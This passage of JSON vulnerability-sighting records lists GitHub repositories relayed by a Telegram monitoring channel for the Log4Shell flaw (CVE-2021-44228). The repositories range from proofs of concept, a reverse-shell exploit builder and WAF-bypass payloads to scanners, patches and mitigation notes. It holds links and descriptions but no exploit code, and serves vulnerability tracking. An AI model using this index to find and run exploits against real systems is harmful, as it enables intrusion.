Java\u7248\u672c\uff0cdnslog\u9009\u53d6\u4e86\u975ednslog.cn\u57df\u540d\nURL\uff1ahttps://github.com/f0ng/log4j2burpscanner", "creation_timestamp": "2021-12-11T07:07:34.000000Z"}, {"uuid": "d76213eb-9859-432a-894a-37696f02da72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/936", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPatch Pulsar Docker images with Log4J 2.15.0 update to mitigate CVE-2021-44228\nURL\uff1ahttps://github.com/lhotari/pulsar-docker-images-patch-CVE-2021-44228", "creation_timestamp": "2021-12-11T10:43:50.000000Z"}, {"uuid": "3dff12bb-61ee-439d-bad1-2bc2775dd345", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/935", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA Nuclei Template for Apache Log4j RCE (CVE-2021-44228) Detection with WAF Bypass Payloads\nURL\uff1ahttps://github.com/toramanemre/log4j-rce-detect-waf-bypass", "creation_timestamp": "2021-12-11T10:22:50.000000Z"}, {"uuid": "1418cf3b-8925-4492-aef7-eb27c6807f4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/934", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4Shell CVE-2021-44228 mitigation tester\nURL\uff1ahttps://github.com/lhotari/log4shell-mitigation-tester", "creation_timestamp": "2021-12-11T10:18:43.000000Z"}, {"uuid": "420cb147-902b-4fd4-aadd-2d4f58ba1c85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/943", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aproof of concept for CVE-2021-44228\nURL\uff1ahttps://github.com/trevalkov/javalogslulz", "creation_timestamp": "2021-12-11T14:37:09.000000Z"}, {"uuid": "31654f5c-1d31-4010-83b8-65504fa7d7ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/941", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA Terraform to deploy vulnerable app and a JDNIExploit to work with CVE-2021-44228\nURL\uff1ahttps://github.com/Mormoroth/log4j-vulnerable-app-cve-2021-44228-terraform", "creation_timestamp": "2021-12-11T13:59:13.000000Z"}, {"uuid": "317b714a-d6d2-4afa-8801-3eef708c92bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/940", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4j-RCE (CVE-2021-44228) Proof of Concept\nURL\uff1ahttps://github.com/PwnC00re/Log4J_0day_RCE", "creation_timestamp": "2021-12-11T13:30:29.000000Z"}, {"uuid": "3741424a-02ce-4589-a8d8-219204b15dae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1036", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4j 2 (CVE-2021-44228) vulnerability scanner for Windows OS\nURL\uff1ahttps://github.com/name/log4j-scanner", "creation_timestamp": "2021-12-13T22:15:10.000000Z"}, {"uuid": "644cf2a9-032b-4994-806a-bca7f07bca4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1134", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4j2 Vulnerability (CVE-2021-44228)\nURL\uff1ahttps://github.com/RenYuH/log4j-lookups-vulnerability", "creation_timestamp": "2021-12-17T09:45:47.000000Z"}, {"uuid": "41683430-60ed-4afb-8abf-cdff375670fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1162", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA fully automated, reliable, super-fast, mass scanning and validation toolkit for the Log4J RCE CVE-2021-44228 vulnerability.\nURL\uff1ahttps://github.com/0xInfection/LogMePwn", "creation_timestamp": "2021-12-18T17:24:29.000000Z"}, {"uuid": "9c231883-f312-41b4-b6ca-2ef9e74d98c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1215", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aProof of Concept of apache log4j LDAP lookup vulnerability. CVE-2021-44228\nURL\uff1ahttps://github.com/0x3SC4L4T3/Apache-Log4j-POC", "creation_timestamp": "2021-12-22T22:48:56.000000Z"}, {"uuid": "3e676c18-7d2e-48f1-826a-c5409ceec037", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1213", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4JChecker checks for CVE-2021-44228 vulnerability\nURL\uff1ahttps://github.com/NatteeSetobol/Log4JChecker", "creation_timestamp": "2021-12-22T15:17:39.000000Z"}, {"uuid": "9c8f4135-f014-4307-8d57-386c00c03253", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1212", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228-FIX-JARS\nURL\uff1ahttps://github.com/asyzdykov/cve-2021-44228-fix-jars", "creation_timestamp": "2021-12-22T10:18:59.000000Z"}, {"uuid": "7d4321ee-9bcf-476d-a5d2-20354ce123b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1251", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPresents how to exploit CVE-2021-44228 vulnerability.\nURL\uff1ahttps://github.com/MarceloLeite2604/log4j-vulnerability", "creation_timestamp": "2021-12-30T19:11:40.000000Z"}, {"uuid": "2c648bf9-8398-4282-8928-f15e314ff88b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1246", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aScript to create a log4j (CVE-2021-44228) exploit with support for different methods of getting a reverse shell\nURL\uff1ahttps://github.com/a5tra/log4j-exploit-builder", "creation_timestamp": "2022-06-07T17:45:09.000000Z"}, {"uuid": "b3512fce-1b1e-41b2-a7d1-635ee1dee5b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1271", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA vulnerable web app for log4j2 RCE(CVE-2021-44228) exploit test.\nURL\uff1ahttps://github.com/kanitan/log4j2-web-vulnerable", "creation_timestamp": "2022-01-05T08:15:41.000000Z"}, {"uuid": "de528b31-c44b-4e29-967e-1b5520b3e5a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/cKure/8423", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046)\n\nhttps://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/", "creation_timestamp": "2021-12-15T18:34:13.000000Z"}, {"uuid": "b898909c-0c7f-4fca-b661-c43e723e5252", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/923", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1a\u4e00\u4e2a\u9488\u5bf9\u9632\u5fa1 log4j2 CVE-2021-44228 \u6f0f\u6d1e\u7684 RASP \u5de5\u5177\u3002 A Runtime Application Self-Protection module specifically designed for log4j2 RCE (CVE-2021-44228) defense.\nURL\uff1ahttps://github.com/boundaryx/cloudrasp-log4j2", "creation_timestamp": "2021-12-11T02:54:05.000000Z"}, {"uuid": "b8c47354-cb0f-44e0-a8a9-828ba5f369c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/922", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA short demo of CVE-2021-44228\nURL\uff1ahttps://github.com/phoswald/sample-ldap-exploit", "creation_timestamp": "2021-12-11T02:49:58.000000Z"}, {"uuid": "c8e502b0-0595-4368-9044-7ff7fea2a36e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/921", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability. \nURL\uff1ahttps://github.com/kozmer/log4j-shell-poc", "creation_timestamp": "2021-12-11T02:37:26.000000Z"}, {"uuid": "8ab032d5-d83c-4e04-b46b-3c14cfd01ef5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/925", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4j2 CVE-2021-44228 \u590d\u73b0\u548c\u56de\u663e\u5229\u7528\nURL\uff1ahttps://github.com/binganao/Log4j2-RCE", "creation_timestamp": "2021-12-11T03:39:53.000000Z"}, {"uuid": "c98fc6df-f629-4473-8ac2-bc6455babd20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/933", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1a\ud83d\udc31\u200d\ud83d\udcbb \u2702\ufe0f \ud83e\udd2c CVE-2021-44228 - LOG4J Java exploit - A trick to bypass words blocking patches\nURL\uff1ahttps://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words", "creation_timestamp": "2021-12-11T10:14:36.000000Z"}, {"uuid": "1f33dd8c-4a05-40ce-8bab-78fbd09317f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/931", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228 DFIR Notes\nURL\uff1ahttps://github.com/Azeemering/CVE-2021-44228-DFIR-Notes", "creation_timestamp": "2021-12-11T07:53:33.000000Z"}, {"uuid": "6b0a5f51-1092-449c-a1ac-dcef1e2f9544", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1012", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aBurp extension to scan Log4Shell (CVE-2021-44228) vulnerability pre and post auth.\nURL\uff1ahttps://github.com/0xDexter0us/Log4J-Scanner", "creation_timestamp": "2021-12-13T11:08:11.000000Z"}, {"uuid": "81e8f72e-727a-4135-b350-b67d7b2e4674", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1011", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1asimple python scanner to check if your network is vulnerable to CVE-2021-44228\nURL\uff1ahttps://github.com/sinakeshmiri/log4jScan", "creation_timestamp": "2021-12-13T11:03:53.000000Z"}, {"uuid": "a3875b59-f1fd-4105-94dc-5969fd8c1bfb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1010", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aResearch into the implications of CVE-2021-44228 in Spring based applications.\nURL\uff1ahttps://github.com/Camphul/log4shell-spring-framework-research", "creation_timestamp": "2021-12-13T10:38:23.000000Z"}, {"uuid": "b729494b-8af7-4f3c-b4b9-06a127b979af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1053", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLittle recap of the log4j2 remote code execution (CVE-2021-44228)\nURL\uff1ahttps://github.com/cbuschka/log4j2-rce-recap", "creation_timestamp": "2021-12-14T09:41:59.000000Z"}, {"uuid": "d621cab6-bd0e-4438-aeab-4185e1ffd829", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1052", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLittle recap of the log4j2 remote code execution (CVE-2021-44228)\nURL\uff1ahttps://github.com/jan-muhammad-zaidi/Log4j-CVE-2021-44228", "creation_timestamp": "2021-12-14T09:37:37.000000Z"}, {"uuid": "c8f02ca3-a307-4879-a65b-df79ade643eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1062", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228 on Podman\nURL\uff1ahttps://github.com/ahmad4fifz/CVE-2021-44228", "creation_timestamp": "2021-12-14T15:31:09.000000Z"}, {"uuid": "31301bfc-8108-4cfa-b43c-31591b5aca44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1169", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aDetails : CVE-2021-44228\nURL\uff1ahttps://github.com/34zY/JNDI-Exploit-1.2-log4shell", "creation_timestamp": "2021-12-19T07:59:18.000000Z"}, {"uuid": "978d51d8-5747-4038-9ac0-a00da5f4b7b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1179", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1alog4j2 Log4Shell CVE-2021-44228 proof of concept\nURL\uff1ahttps://github.com/spasam/log4j2-exploit", "creation_timestamp": "2021-12-20T03:18:51.000000Z"}, {"uuid": "395308b0-20c5-4265-8792-0996953df784", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1178", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228 fix\nURL\uff1ahttps://github.com/DragonSurvivalEU/RCE", "creation_timestamp": "2021-12-20T00:41:47.000000Z"}, {"uuid": "8d689f15-8ddd-4d9c-8b57-649e874945fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1193", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aScan and patch tool for CVE-2021-44228 and related log4j concerns. \nURL\uff1ahttps://github.com/sassoftware/loguccino", "creation_timestamp": "2021-12-21T03:05:44.000000Z"}, {"uuid": "3b86e989-f238-4a1b-a246-f31166e300b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1199", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPOC for CVE-2021-44228 within Springboot\nURL\uff1ahttps://github.com/mn-io/log4-spring-vuln-poc", "creation_timestamp": "2021-12-21T15:05:45.000000Z"}, {"uuid": "4dd825f2-e59b-4448-8a62-5e3798f4388b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/960", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aAn All-In-One Pure Python PoC for CVE-2021-44228\nURL\uff1ahttps://github.com/alexandre-lavoie/python-log4rce", "creation_timestamp": "2021-12-12T04:50:27.000000Z"}, {"uuid": "e15a7fcc-3d94-4add-a1fa-79d59d047587", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1210", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA Smart Log4Shell/Log4j/CVE-2021-44228 Scanner\nURL\uff1ahttps://github.com/ossie-git/log4shell_sentinel", "creation_timestamp": "2021-12-22T08:40:31.000000Z"}, {"uuid": "6d99a40a-c66d-4281-86f1-2f885e72d051", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/GithubRedTeam/1209", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4J CVE-2021-44228 : Mitigation Cheat Sheet\nURL\uff1ahttps://github.com/thedevappsecguy/Log4J-Mitigation-CVE-2021-44228--CVE-2021-45046--CVE-2021-45105", "creation_timestamp": "2021-12-22T05:41:25.000000Z"}, {"uuid": "98b9604f-ae7e-4a3a-ba35-7548e2c6cd77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1219", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aTest exploit of CVE-2021-44228\nURL\uff1ahttps://github.com/asaotomo/CVE-2021-42013-Apache-RCE-POC-EXP", "creation_timestamp": "2021-12-23T14:22:31.000000Z"}, {"uuid": "d4f142e7-0bf8-4737-9c40-0ce1ffde5b32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1277", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA simple program to demonstrate how Log4j vulnerability can be exploited ( CVE-2021-44228 ) \nURL\uff1ahttps://github.com/ChandanShastri/Log4j_Vulnerability_Demo", "creation_timestamp": "2022-01-05T15:29:13.000000Z"}, {"uuid": "2b057058-68be-498b-a84d-5e3967e22ca1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/950", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4j-RCE (CVE-2021-44228) Proof of Concept with additional information\nURL\uff1ahttps://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept", "creation_timestamp": "2021-12-11T16:59:24.000000Z"}, {"uuid": "77dd5a6f-b64d-4dc9-9837-894969cebd5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/959", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aScript to patch VMware vCenter log4j vulnerability CVE-2021-44228\nURL\uff1ahttps://github.com/blake-fm/vcenter-log4j", "creation_timestamp": "2021-12-12T04:33:46.000000Z"}, {"uuid": "b745553d-84d9-48ce-bf8c-ed06b9da3a7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/958", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aApache Log4j CVE-2021-44228 \u6f0f\u6d1e\u590d\u73b0\nURL\uff1ahttps://github.com/zhangxvx/Log4j-Rec-CVE-2021-44228", "creation_timestamp": "2021-12-12T03:52:15.000000Z"}, {"uuid": "cd204d3f-85ac-4725-b9eb-1e49211b6b79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/957", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aApache Log4j2 CVE-2021-44228 RCE\nURL\uff1ahttps://github.com/mzlogin/CVE-2021-44228-Demo", "creation_timestamp": "2021-12-12T03:14:51.000000Z"}, {"uuid": "b339dc0d-7213-4f27-9e13-e710f46ef959", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/968", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aAbuse Log4J CVE-2021-44228 to patch CVE-2021-44228 in vulnerable Minecraft game sessions to prevent exploitation in the session :) \nURL\uff1ahttps://github.com/0-x-2-2/CVE-2021-44228", "creation_timestamp": "2021-12-12T11:28:24.000000Z"}, {"uuid": 